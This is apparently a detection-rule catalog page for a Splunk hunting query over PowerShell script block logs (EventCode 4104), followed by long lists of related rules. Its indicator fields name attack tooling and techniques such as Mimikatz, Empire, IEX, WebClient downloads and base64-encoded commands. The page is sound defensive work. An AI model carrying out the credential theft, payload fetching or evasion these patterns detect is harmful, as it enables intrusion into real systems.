Detection rules › Splunk
PowerShell 4104 Hunting
The following analytic identifies suspicious PowerShell execution using Script Block Logging (EventCode 4104). It leverages specific patterns and keywords within the ScriptBlockText field to detect potentially malicious activities. This detection is significant for SOC analysts as PowerShell is commonly used by attackers for various malicious purposes, including code execution, privilege escalation, and persistence. If confirmed malicious, this activity could allow attackers to execute arbitrary commands, exfiltrate data, or maintain long-term access to the compromised system, posing a severe threat to the organization's security.
MITRE ATT&CK coverage
| Tactic | Techniques |
|---|---|
| Execution | T1059.001 Command and Scripting Interpreter: PowerShell |
Event coverage
| Provider | Event ID | Title |
|---|---|---|
| PowerShell | 4104 | Creating Scriptblock text (MessageNumber of MessageTotal). |
Stages and Predicates
Stage 1: search
search EventCode=4104
Stage 2: eval
eval ... using (ScriptBlockText)
Stage 3: eval
eval ... using (ScriptBlockText)
Stage 4: eval
eval ... using (ScriptBlockText)
Stage 5: eval
eval ... using (ScriptBlockText)
Stage 6: eval
eval ... using (ScriptBlockText)
Stage 7: eval
eval ... using (ScriptBlockText)
Stage 8: eval
eval ... using (ScriptBlockText)
Stage 9: eval
eval ... using (ScriptBlockText)
Stage 10: eval
eval ... using (ScriptBlockText)
Stage 11: eval
eval ... using (ScriptBlockText)
Stage 12: eval
eval ... using (ScriptBlockText)
Stage 13: eval
eval ... using (ScriptBlockText)
Stage 14: eval
eval ... using (ScriptBlockText)
Stage 15: eval
eval ... using (ScriptBlockText)
Stage 16: eval
eval ... using (ScriptBlockText)
Stage 17: eval
eval ... using (ScriptBlockText)
Stage 18: eval
eval ... using (ScriptBlockText)
Stage 19: eval
eval ... using (ScriptBlockText)
Stage 20: addtotals
addtotals
Stage 21: stats
stats BY UserID, Computer, DoIt, enccom, compressed, downgrade, iex, mimikatz, rundll32, empire, webclient, syswow64, httplocal, reflection, invokewmi, invokecmd, base64, get, suspcmdlet, suspkeywrd
Stage 22: rename
rename
Stage 23: search
search `macro`
Indicators
Each row is a field, operator, and value that the rule matches. The corpus column counts how many other rules in the catalog look for the same combination: high numbers point to widely-used, community-vetted indicators. Blank or 1 shows that the indicator is specific to this rule.
| Field | Kind | Values |
|---|---|---|
EventCode | eq |
|
Neighbors
Stricter alternatives (narrower than this rule)
The rules below may be useful if you find the current rule is too noisy / lacks specificity.
- Windows Exfiltration Over C2 Via Invoke RestMethod (adds 5 filters)
- Windows Gather Victim Host Information Camera (adds 5 filters)
- Allow Inbound Traffic In Firewall Rule (adds 4 filters)
- GetWmiObject DS User with PowerShell Script Block (adds 4 filters)
- Remote Process Instantiation via WMI and PowerShell Script Block (adds 4 filters)
- AdsiSearcher Account Discovery (adds 3 filters)
- GetWmiObject Ds Computer with PowerShell Script Block (adds 3 filters)
- GetWmiObject Ds Group with PowerShell Script Block (adds 3 filters)
- Remote System Discovery with Adsisearcher (adds 3 filters)
- Windows Account Discovery for None Disable User Account (adds 3 filters)
- Windows Linked Policies In ADSI Discovery (adds 3 filters)
- Windows PowerShell Disable HTTP Logging (adds 3 filters)
- Windows Powershell Import Applocker Policy (adds 3 filters)
- Windows Root Domain linked policies Discovery (adds 3 filters)
- Delete ShadowCopy With PowerShell (adds 2 filters)
- Detect Copy of ShadowCopy with Script Block Logging (adds 2 filters)
- Detect Empire with PowerShell Script Block Logging (adds 2 filters)
- Disabled Kerberos Pre-Authentication Discovery With Get-ADUser (adds 2 filters)
- Disabled Kerberos Pre-Authentication Discovery With PowerView (adds 2 filters)
- Elevated Group Discovery with PowerView (adds 2 filters)
- Get ADUser with PowerShell Script Block (adds 2 filters)
- Get WMIObject Group Discovery with Script Block Logging (adds 2 filters)
- GetCurrent User with PowerShell Script Block (adds 2 filters)
- GetWmiObject User Account with PowerShell Script Block (adds 2 filters)
- Interactive Session on Remote Endpoint with PowerShell (adds 2 filters)
- Kerberos Pre-Authentication Flag Disabled with PowerShell (adds 2 filters)
- Powershell Enable SMB1Protocol Feature (adds 2 filters)
- Powershell Remote Services Add TrustedHost (adds 2 filters)
- Powershell Remove Windows Defender Directory (adds 2 filters)
- Powershell Using memory As Backing Store (adds 2 filters)
- PowerShell WebRequest Using Memory Stream (adds 2 filters)
- Powershell Windows Defender Exclusion Commands (adds 2 filters)
- Recon AVProduct Through Pwh or WMI (adds 2 filters)
- Recon Using WMI Class (adds 2 filters)
- Remote Process Instantiation via WinRM and PowerShell Script Block (adds 2 filters)
- Windows Account Discovery for Sam Account Name (adds 2 filters)
- Windows Account Discovery With NetUser PreauthNotRequire (adds 2 filters)
- Windows Archive Collected Data via Powershell (adds 2 filters)
- Windows Domain Account Discovery Via Get-NetComputer (adds 2 filters)
- Windows ESX Admins Group Creation via PowerShell (adds 2 filters)
- Windows Exfiltration Over C2 Via Powershell UploadString (adds 2 filters)
- Windows Get-AdComputer Unconstrained Delegation Discovery (adds 2 filters)
- Windows Powershell Cryptography Namespace (adds 2 filters)
- Windows PowerShell Get CIMInstance Remote Computer (adds 2 filters)
- Windows Powershell History File Deletion (adds 2 filters)
- Windows PowerShell Invoke-RestMethod IP Information Collection (adds 2 filters)
- Windows PowerShell MSIX Package Installation (adds 2 filters)
- Windows PowerView Constrained Delegation Discovery (adds 2 filters)
- Windows PowerView SPN Discovery (adds 2 filters)
- Windows PowerView Unconstrained Delegation Discovery (adds 2 filters)
- Windows Screen Capture Via Powershell (adds 2 filters)
- WMI Recon Running Process Or Services (adds 2 filters)
- Detect Certify With PowerShell Script Block Logging (adds 1 filter)
- Detect Mimikatz With PowerShell Script Block Logging (adds 1 filter)
- Exchange PowerShell Module Usage (adds 1 filter)
- Get ADDefaultDomainPasswordPolicy with Powershell Script Block (adds 1 filter)
- Get ADUserResultantPasswordPolicy with Powershell Script Block (adds 1 filter)
- Get DomainPolicy with Powershell Script Block (adds 1 filter)
- Get-DomainTrust with PowerShell Script Block (adds 1 filter)
- Get DomainUser with PowerShell Script Block (adds 1 filter)
- Get-ForestTrust with PowerShell Script Block (adds 1 filter)
- GetAdComputer with PowerShell Script Block (adds 1 filter)
- GetAdGroup with PowerShell Script Block (adds 1 filter)
- GetDomainComputer with PowerShell Script Block (adds 1 filter)
- GetDomainController with PowerShell Script Block (adds 1 filter)
- GetDomainGroup with PowerShell Script Block (adds 1 filter)
- GetLocalUser with PowerShell Script Block (adds 1 filter)
- GetNetTcpconnection with PowerShell Script Block (adds 1 filter)
- Mailsniper Invoke functions (adds 1 filter)
- Powershell COM Hijacking InprocServer32 Modification (adds 1 filter)
- Powershell Creating Thread Mutex (adds 1 filter)
- PowerShell Domain Enumeration (adds 1 filter)
- PowerShell Enable PowerShell Remoting (adds 1 filter)
- Powershell Execute COM Object (adds 1 filter)
- Powershell Fileless Process Injection via GetProcAddress (adds 1 filter)
- Powershell Fileless Script Contains Base64 Encoded Content (adds 1 filter)
- Powershell Get LocalGroup Discovery with Script Block Logging (adds 1 filter)
- PowerShell Invoke CIMMethod CIMSession (adds 1 filter)
- PowerShell Invoke WmiExec Usage (adds 1 filter)
- Powershell Load Module in Meterpreter (adds 1 filter)
- PowerShell Loading DotNET into Memory via Reflection (adds 1 filter)
- Powershell Processing Stream Of Data (adds 1 filter)
- PowerShell Script Block With URL Chain (adds 1 filter)
- PowerShell Start or Stop Service (adds 1 filter)
- Remote Process Instantiation via DCOM and PowerShell Script Block (adds 1 filter)
- ServicePrincipalNames Discovery with PowerShell (adds 1 filter)
- Unloading AMSI via Reflection (adds 1 filter)
- User Discovery With Env Vars PowerShell Script Block (adds 1 filter)
- Windows ClipBoard Data via Get-ClipBoard (adds 1 filter)
- Windows Enable PowerShell Web Access (adds 1 filter)
- Windows File Share Discovery With Powerview (adds 1 filter)
- Windows Find Domain Organizational Units with GetDomainOU (adds 1 filter)
- Windows Find Interesting ACL with FindInterestingDomainAcl (adds 1 filter)
- Windows Forest Discovery with GetForestDomain (adds 1 filter)
- Windows Get Local Admin with FindLocalAdminAccess (adds 1 filter)
- Windows PowerShell Add Module to Global Assembly Cache (adds 1 filter)
- Windows PowerShell Export Certificate (adds 1 filter)
- Windows PowerShell Export PfxCertificate (adds 1 filter)
- Windows PowerShell IIS Components WebGlobalModule Usage (adds 1 filter)
- Windows PowerShell Invoke-Sqlcmd Execution (adds 1 filter)
- Windows Powershell Logoff User via Quser (adds 1 filter)
- Windows PowerShell ScheduleTask (adds 1 filter)
- Windows PowerShell Script Block With Malicious String (adds 1 filter)
- Windows PowerShell WMI Win32 ScheduledJob (adds 1 filter)
- Windows PowerSploit GPP Discovery (adds 1 filter)
- Windows PowerView AD Access Control List Enumeration (adds 1 filter)
- Windows PowerView Kerberos Service Ticket Request (adds 1 filter)
Broader alternatives (more inclusive than this rule)
These rules match a superset of what this rule catches. They cover the same events plus more. Use them if you want wider coverage and can absorb more false positives.
- Potential PowerShell Obfuscation via Invalid Escape Sequences (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via Backtick-Escaped Variable Expansion (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via Character Array Reconstruction (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via Concatenated Dynamic Command Invocation (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via High Numeric Character Proportion (drops 1 filter this rule applies)
- Potential Dynamic IEX Reconstruction via Environment Variables (drops 1 filter this rule applies)
- Dynamic IEX Reconstruction via Method String Access (drops 1 filter this rule applies)
- PowerShell Obfuscation via Negative Index String Reversal (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via Reverse Keywords (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via String Concatenation (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via String Reordering (drops 1 filter this rule applies)
- Potential PowerShell Obfuscation via Special Character Overuse (drops 1 filter this rule applies)